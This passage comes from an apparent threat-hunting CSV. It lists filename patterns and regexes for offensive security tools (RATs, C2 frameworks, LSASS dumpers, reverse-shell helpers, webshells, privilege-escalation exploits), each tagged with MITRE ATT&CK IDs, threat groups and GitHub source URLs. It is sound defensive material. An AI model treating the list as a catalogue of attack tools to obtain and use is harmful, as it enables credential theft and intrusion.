Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","17860" "*\RedDevil v1.0.exe*",".{0,1000}\\RedDevil\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17861" "*\RedGuard -*","RedGuard\s\-.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","17862" 
"*\redirecttosmb.py*",".{0,1000}\\redirecttosmb\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","17863" "*\RedPersist.exe*",".{0,1000}\\RedPersist\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","17864" "*\RedPersist.pdb*",".{0,1000}\\RedPersist\.pdb.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","17865" "*\RedPersist.sln*",".{0,1000}\\RedPersist\.sln.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","17866" "*\RedPersist-main\*",".{0,1000}\\RedPersist\-main\\.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","17867" 
"*\redpill.ps1*",".{0,1000}\\redpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17868" "*\redpill.zip*",".{0,1000}\\redpill\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17869" "*\redpill.zip*",".{0,1000}\\redpill\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17870" "*\redpill\bin\*.ps1*",".{0,1000}\\redpill\\bin\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","17871" "*\ReflectDump.exe*",".{0,1000}\\ReflectDump\.exe.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","17873" "*\ReflectDump.vcxproj*",".{0,1000}\\ReflectDump\.vcxproj.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. 
Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","17874" "*\reflective_dll.x64.dll*",".{0,1000}\\reflective_dll\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","17875" "*\ReflectiveDll.cpp*",".{0,1000}\\ReflectiveDll\.cpp.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17876" "*\ReflectiveDll.x64.dll*",".{0,1000}\\ReflectiveDll\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17877" "*\ReflectiveLoader.cpp*",".{0,1000}\\ReflectiveLoader\.cpp.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","17878" "*\ReflectivePick.cpp*",".{0,1000}\\ReflectivePick\.cpp.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17879" "*\ReflectivePick_x64.dll*",".{0,1000}\\ReflectivePick_x64\.dll.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17880" "*\ReflectivePick_x86.dll*",".{0,1000}\\ReflectivePick_x86\.dll.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","17881" 
"*\reg_recover-rs.exe*",".{0,1000}\\reg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17883" "*\RegfDenyTSConnections.ps1*",".{0,1000}\\RegfDenyTSConnections\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","17884" "*\RegHiveBackup.cfg*",".{0,1000}\\RegHiveBackup\.cfg.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17885" "*\reghivebackup.zip*",".{0,1000}\\reghivebackup\.zip.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17886" "*\register dll.exe*",".{0,1000}\\register\sdll\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17887" "*\registry-read.py*",".{0,1000}\\registry\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","17888" "*\reg-query.py*",".{0,1000}\\reg\-query\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17889" "*\RegRdpPort.ps1*",".{0,1000}\\RegRdpPort\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 
- T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17890" "*\regread.lua*",".{0,1000}\\regread\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","17891" "*\regwrite.lua*",".{0,1000}\\regwrite\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","17892" "*\regwritedel.lua*",".{0,1000}\\regwritedel\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","17893" 
"*\Relay\Attacks\ShadowCred.cs*",".{0,1000}\\Relay\\Attacks\\ShadowCred\.cs.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","17894" "*\Release\CheckPort.pdb*",".{0,1000}\\Release\\CheckPort\.pdb.{0,1000}","offensive_tool_keyword","CheckPort","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17895" "*\Release\CheckPort.pdb*",".{0,1000}\\Release\\CheckPort\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","CheckPort","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17896" "*\Release\gmer.pdb*",".{0,1000}\\Release\\gmer\.pdb.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti -
8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#content","N/A","9","10","N/A","N/A","N/A","N/A","17897" "*\Release\Injected.dll*",".{0,1000}\\Release\\Injected\.dll.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","17898" "*\Release\SharpCradle.pdb*",".{0,1000}\\Release\\SharpCradle\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17899" "*\Release\SharpSploitConsole.pdb*",".{0,1000}\\Release\\SharpSploitConsole\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17900" 
"*\Release\SharpView.pdb*",".{0,1000}\\Release\\SharpView\.pdb.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","17901" "*\Release\SpoolFool.pdb*",".{0,1000}\\Release\\SpoolFool\.pdb.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","17902" "*\remot shell.pl*",".{0,1000}\\remot\sshell\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17910" "*\RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\\RemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17930" "*\RemoteCamera.dll*",".{0,1000}\\RemoteCamera\.dll.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in 
C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","17931" "*\remotedesktop.exe*",".{0,1000}\\remotedesktop\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","17938" "*\RemoteHashRetrieval.ps1*",".{0,1000}\\RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","17940" "*\RemoteKrbRelay\*",".{0,1000}\\RemoteKrbRelay\\.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","17946" "*\RemoteKrbRelay-main*",".{0,1000}\\RemoteKrbRelay\-main.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","17947" 
"*\RemoteMaint.sln*",".{0,1000}\\RemoteMaint\.sln.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17948" "*\RemoteMaint.vcxproj*",".{0,1000}\\RemoteMaint\.vcxproj.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17949" "*\RemoteMaintsvc.exe*",".{0,1000}\\RemoteMaintsvc\.exe.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17950" "*\RemoteMaintsvc.exe*",".{0,1000}\\RemoteMaintsvc\.exe.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","17951" "*\RemotePenetration.exe*",".{0,1000}\\RemotePenetration\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","18004" "*\RemotePotato0.cpp*",".{0,1000}\\RemotePotato0\.cpp.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","18005" "*\RemotePotato0.sln*",".{0,1000}\\RemotePotato0\.sln.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 